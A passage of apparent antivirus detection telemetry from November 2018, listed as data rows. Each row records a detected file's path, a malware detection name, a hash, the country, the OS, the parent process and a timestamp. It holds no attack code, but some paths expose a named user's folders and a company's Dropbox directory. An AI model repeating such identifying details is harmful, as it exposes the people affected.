  Row(detection=Row(filename='mhx-xs.exe', filepath='h:\\العاب\\الفراخ 3\\MHX-XS.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:43:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl180.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl180.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='reggen.exe', filepath='C:\\Program Files\\DAEMON Tools Ultra\\RegGen.exe', filesize=2176000, name='HEUR/AGEN.1033304.#M1.#R1'), hash='d3035ca1880bf9cdf2b3c1d93358a8b399890ab7fe80d1f404c32a26d624f2dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292c49', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292c49', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:17:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029496f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029496f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111110-a87b3977', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdc3d38d\\AVSCAN-20181104-110901-9C74035A\\AVSCAN-20181104-111110-A87B3977', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:11:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b5ac', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b5ac', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:15:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184648-c0571169', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184648-C0571169', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:46:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296ad5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296ad5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:31:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='email sender.exe', filepath='F:\\هام\\Email Sender Pro V0.2\\Email Sender.exe', filesize=576000, name='W32/Neshta.A.#M1.#R1'), hash='eac8f7a07044454e7584d70d5c09e77a41afe39a659eed19311fa88b273d4061', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:12:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:00:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='physics_rt.dll', filepath='i:\\العاب جديدة\\العاب جديدة\\الكره العجيبه\\buildingblocks\\physics_RT.dll', filesize=512000, name='W32/Ramnit.C.#M1.#R1'), hash='e72e4afcfa5c33a7d3d27776137f8c997b3c52d89d8a8a4745f1ca21e45893ec', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:18:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e9e44ea6bbe8b7293c404cbc0146cf1755eed244d4e480453eab93314f8ba447', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E9E44EA6BBE8B7293C404CBC0146CF1755EED244D4E480453EAB93314F8BA447', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e9e44ea6bbe8b7293c404cbc0146cf1755eed244d4e480453eab93314f8ba447', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:24:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fdd33eb1e444763fcc585701992085e9fab6dd6a767d150ffa2f70c293320e2a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FDD33EB1E444763FCC585701992085E9FAB6DD6A767D150FFA2F70C293320E2A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fdd33eb1e444763fcc585701992085e9fab6dd6a767d150ffa2f70c293320e2a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:29:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atube_catcher_atu3_9000.exe', filepath='C:\\Users\\X\\Downloads\\aTube_Catcher_ATU3_9000.exe', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f5b8e5c0803794289e72c405263c36d786adce9d1a15a7a8576168aec3d3a02e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F5B8E5C0803794289E72C405263C36D786ADCE9D1A15A7A8576168AEC3D3A02E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f5b8e5c0803794289e72c405263c36d786adce9d1a15a7a8576168aec3d3a02e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:18Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='4d0d3a5d833b85d144ec867bdbc03369b8af15fbd47b5c83764b2e453b322f39', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-3.categorizing\\4D0D3A5D833B85D144EC867BDBC03369B8AF15FBD47B5C83764B2E453B322F39', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='4d0d3a5d833b85d144ec867bdbc03369b8af15fbd47b5c83764b2e453b322f39', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T13:44:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182836-d11ea9c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a82e24d\\AVSCAN-20181102-181753-5E756B46\\AVSCAN-20181102-182836-D11EA9C5', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:28:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\LOCAL\\Temp\\tmp7990782\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-02T18:31:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0C4DDE5EE9A149AE874FB8A12E2A55A20045A0F7AE7BB323D67FDBC180D5AA5D', filesize=1580000, name='HEUR/AGEN.1035178.#M1.#R1'), hash='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:52:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=324608, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='colorcpl.exe', filepath='\\\\?\\E:\\Windows.old\\WINDOWS\\SysWOW64\\colorcpl.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='4b5c55f19983d55291642241712792dd57088fdaabfdfd48294d1dac7599a0f4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:01:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wizard_setupfailed.htm', filepath='C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\TANTO CITRA MANDIRI Team Folder\\Campur2\\File Epson\\Manual\\PanelGuide\\RO\\_files\\wizard_setupfailed.htm', filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='57531585e9394334969a8fae07ae2770a4df820319f89fd3cb21a97119501142', metadata=Row(cmdline='\\\\\\/systemstartup', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-02T08:09:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa11124.7596\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$DIa252.7341\\\\\\\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.rar', country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2241752, timestamp='2018-11-02T16:36:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bi rate.bat', filepath='D:\\DOKUMENKU\\LPS GAB\\BI RATE\\BI RATE.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T05:02:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155812-e192ff9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155812-E192FF9A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195017-a8990d30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_759cb39a\\AVSCAN-20181102-194944-A23CF887\\AVSCAN-20181102-195017-A8990D30', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:50:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='easyanticheat_setup.exe', filepath='F:\\Program Files (x86)\\Soleed Games\\Far Cry 5\\bin\\EasyAntiCheat\\EasyAntiCheat_Setup.exe', filesize=848000, name='W32/Sality.AT.#M1.#R1'), hash='439b0f1ea02271af8927e1474222fd4d615c2b7af972069a3dc084d9bef26068', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:27:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T21:42:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gminesweeper.exe', filepath='\\\\?\\C:\\Program Files\\Microsoft Games\\Minesweeper\\gMineSweeper.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R7331'), hash='04768c1bf5790790728ee3c6379ca9511c3dfc98a6421dd8fa8e8314d7c1da77', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:11:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spooisv.exe.vir', filepath='\\\\?\\C:\\Windows\\SysWOW64\\spooisv.exe.VIR', filesize=512000, name='HEUR/AGEN.1011827.#M1.#R1'), hash='6f7340a7315f131cd59c400b27f49b5da50b165bb049126a6d7001a5fe0a5db3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-02-10-10-59.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-28T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-02T11:21:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T23:33:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T21:57:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100319-618c7cdf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-100319-618C7CDF', filesize=512000, name='TR/NSIS.13284.#M1.#R1'), hash='0814b284359a33955dc2a65301bcdf56911a3032ed96415488dfcb6c2c2cbb04', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:05:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioca58999c6-d843-5747-8fcf-d8d2ccdd92cb.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\iocA58999C6-D843-5747-8FCF-D8D2CCDD92CB.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T21:00:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='anim.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\ANIM\\ANIM.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:34Z'), dt=datetime.date(2018, 11, 2)),
